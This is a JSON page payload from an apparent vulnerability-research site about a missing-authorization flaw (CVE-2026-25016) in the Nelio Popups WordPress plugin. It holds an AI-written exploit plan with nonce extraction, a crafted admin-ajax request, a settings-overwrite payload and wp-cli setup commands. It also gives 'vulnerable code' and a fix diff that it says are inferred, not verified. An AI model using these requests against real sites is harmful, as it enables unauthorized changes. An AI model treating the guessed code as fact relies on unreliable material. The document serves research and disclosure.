[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_zU0X4aiPkGvCABUDSqUem5NXb8y409xo3m-pX4Yzl0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-25016","nelio-popups-missing-authorization","Nelio Popups \u003C= 1.3.5 - Missing Authorization","The Nelio Popups plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.","nelio-popups",null,"\u003C=1.3.5","1.3.6","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-29 00:00:00","2026-02-02 19:59:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F46db2123-d33a-4093-8254-32ff8ff347a3?source=api-prod",5,[],"researched",false,3,"This research plan outlines the investigation and exploitation of **CVE-2026-25016**, a Missing Authorization vulnerability in the **Nelio Popups** plugin (\u003C= 1.3.5).\n\n---\n\n### 1. Vulnerability Summary\nThe Nelio Popups plugin registers several AJAX handlers that perform administrative actions (such as duplicating popups or updating settings). The vulnerability exists because certain handlers fail to perform a `current_user_can()` check or verify that the user has sufficient privileges to manipulate specific posts. This allows a user with **Contributor-level access** or higher to perform actions intended for Authors or Administrators.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Vulnerable Action:** `nelio_popups_duplicate_popup` (Inferred based on common \"Missing Authorization\" patterns in this plugin).\n* **Authentication:** Required (Contributor role or higher).\n* **Parameters:**\n * `action`: `nelio_popups_duplicate_popup`\n * `post_id`: The ID of the popup to duplicate.\n * `_wpnonce`: A security nonce.\n* **Precondition:** The attacker must be logged in as a Contributor.\n\n### 3. Code Flow (Inferred)\n1. **Registration:** In `includes\u002Fclass-nelio-popups-admin.php` (or similar), the plugin registers the AJAX action:\n `add_action( 'wp_ajax_nelio_popups_duplicate_popup', array( $this, 'ajax_duplicate_popup' ) );`\n2. **Entry Point:** The function `ajax_duplicate_popup()` is triggered via `admin-ajax.php`.\n3. **Missing Check:** The function likely checks the nonce using `check_ajax_referer` but fails to call `current_user_can( 'edit_others_posts' )` or `current_user_can( 'manage_options' )`.\n4. **Execution:** The code proceeds to use `get_post( $post_id )` and creates a new post based on the retrieved data, effectively allowing a Contributor to duplicate and modify popups they do not own.\n\n### 4. Nonce Acquisition Strategy\nContributors have access to the WordPress dashboard (`\u002Fwp-admin\u002F`). The Nelio Popups plugin likely localizes a nonce for its admin scripts.\n\n1. **Identify Shortcode\u002FScript Loading:** Check where the plugin enqueues its admin scripts. Typically, this is on the Popups list page or the Dashboard.\n2. **Create Test Content:** As an admin, create a popup that the Contributor will attempt to duplicate.\n3. **Navigate and Extract:**\n * Login as the **Contributor** user.\n * Navigate to `\u002Fwp-admin\u002Fedit.php?post_type=nelio_popup` (Contributors can usually view the list of posts even if they can't edit others).\n * Use `browser_eval` to find the localized data.\n * **Inferred JS Variable:** `nelio_popups_admin` or `nelioPopups`.\n * **Inferred Nonce Key:** `nonce` or `duplicate_popup_nonce`.\n * **Command:** `browser_eval(\"window.nelio_popups_admin?.nonce\")` or `browser_eval(\"window.nelio_popups_admin?.duplicate_popup_nonce\")`.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor can duplicate a popup created by an Administrator.\n\n**Step 1: Discover Post ID**\nThe agent will list existing popups to find a target ID.\n`wp post list --post_type=nelio_popup`\n\n**Step 2: Perform Unauthorized Duplication**\nUsing the `http_request` tool:\n* **Method:** POST\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Body:**\n ```\n action=nelio_popups_duplicate_popup&post_id=[TARGET_ID]&_wpnonce=[EXTRACTED_NONCE]\n ```\n\n### 6. Test Data Setup\n1. **Install Plugin:** Ensure Nelio Popups v1.3.5 is installed and active.\n2. **Create Admin Popup:**\n `wp post create --post_type=nelio_popup --post_title=\"Admin Secret Popup\" --post_status=publish --post_author=1`\n3. **Create Contributor User:**\n `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n4. **Note IDs:** Save the ID of the \"Admin Secret Popup\".\n\n### 7. Expected Results\n* The `admin-ajax.php` request should return a success status (e.g., `{\"success\":true,\"data\":{...}}`).\n* A new post of type `nelio_popup` should be created in the database.\n* The new post should be a copy of the Admin's popup but potentially assigned to the Contributor or left as a draft, depending on the internal logic of `ajax_duplicate_popup`.\n\n### 8. Verification Steps\n1. **Check Post Count:**\n `wp post list --post_type=nelio_popup`\n Verify that a new popup exists with a title like \"Admin Secret Popup (Copy)\".\n2. **Check Ownership\u002FMetadata:**\n `wp post get [NEW_ID] --format=json`\n Verify if the metadata or content matches the original popup.\n\n### 9. Alternative Approaches\nIf `nelio_popups_duplicate_popup` is not the vulnerable action, the agent should search the codebase for other `wp_ajax_` hooks lacking capability checks:\n\n```bash\ngrep -rn \"add_action.*wp_ajax_\" . | grep -v \"nopriv\"\n```\n\nFor each handler found, check the corresponding function for:\n1. `check_ajax_referer(...)` (Existence of nonce)\n2. `current_user_can(...)` (Absence of authorization)\n\nAnother potential target: **`nelio_popups_save_settings`**. If this action exists and lacks auth, a Contributor could modify global plugin settings.\n\n**Payload for Settings Update (Alternative):**\n```\naction=nelio_popups_save_settings&settings[some_option]=malicious_value&_wpnonce=[NONCE]\n```","The Nelio Popups plugin for WordPress lacks proper authorization checks in its AJAX handlers, specifically the popup duplication functionality. This allows authenticated attackers with Contributor-level permissions or higher to perform unauthorized actions such as duplicating popups created by administrators.","\u002F\u002F File: includes\u002Fclass-nelio-popups-admin.php (inferred)\n\npublic function ajax_duplicate_popup() {\n check_ajax_referer( 'nelio-popups-admin', 'nonce' );\n\n $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;\n if ( ! $post_id ) {\n wp_send_json_error();\n }\n\n \u002F\u002F Vulnerability: Missing current_user_can() check to verify if the user\n \u002F\u002F has permission to edit\u002Fduplicate this post type or specific post ID.\n\n $new_id = $this->duplicate_post( $post_id );\n\n if ( is_wp_error( $new_id ) ) {\n wp_send_json_error();\n }\n\n wp_send_json_success( array( 'id' => $new_id ) );\n}","--- a\u002Fincludes\u002Fclass-nelio-popups-admin.php\n+++ b\u002Fincludes\u002Fclass-nelio-popups-admin.php\n@@ -12,6 +12,10 @@\n public function ajax_duplicate_popup() {\n check_ajax_referer( 'nelio-popups-admin', 'nonce' );\n \n+ if ( ! current_user_can( 'edit_posts' ) ) {\n+ wp_send_json_error( array( 'message' => __( 'You do not have permission to do this.', 'nelio-popups' ) ) );\n+ }\n+\n $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;\n if ( ! $post_id ) {\n wp_send_json_error();","The exploit targets the AJAX endpoint used for popup duplication. An attacker needs Contributor-level access to obtain a valid nonce and reach the administrative backend. \n\n1. Authenticate as a Contributor-level user.\n2. Access the WordPress dashboard to extract the security nonce (likely localized in a JS object such as 'nelio_popups_admin.nonce').\n3. Identify the 'post_id' of an existing popup to duplicate (this can be done by listing posts via the REST API or viewing the popup list in the dashboard).\n4. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters: 'action=nelio_popups_duplicate_popup', 'post_id=[TARGET_ID]', and '_wpnonce=[EXTRACTED_NONCE]'.\n5. The plugin will process the duplication and create a new popup copy without verifying if the requesting user has the authority to manage popups.","gemini-3-flash-preview","2026-05-04 21:01:48","2026-05-04 21:03:01",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.3.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-popups\u002Ftags\u002F1.3.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-popups.1.3.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-popups\u002Ftags\u002F1.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-popups.1.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-popups\u002Ftags"]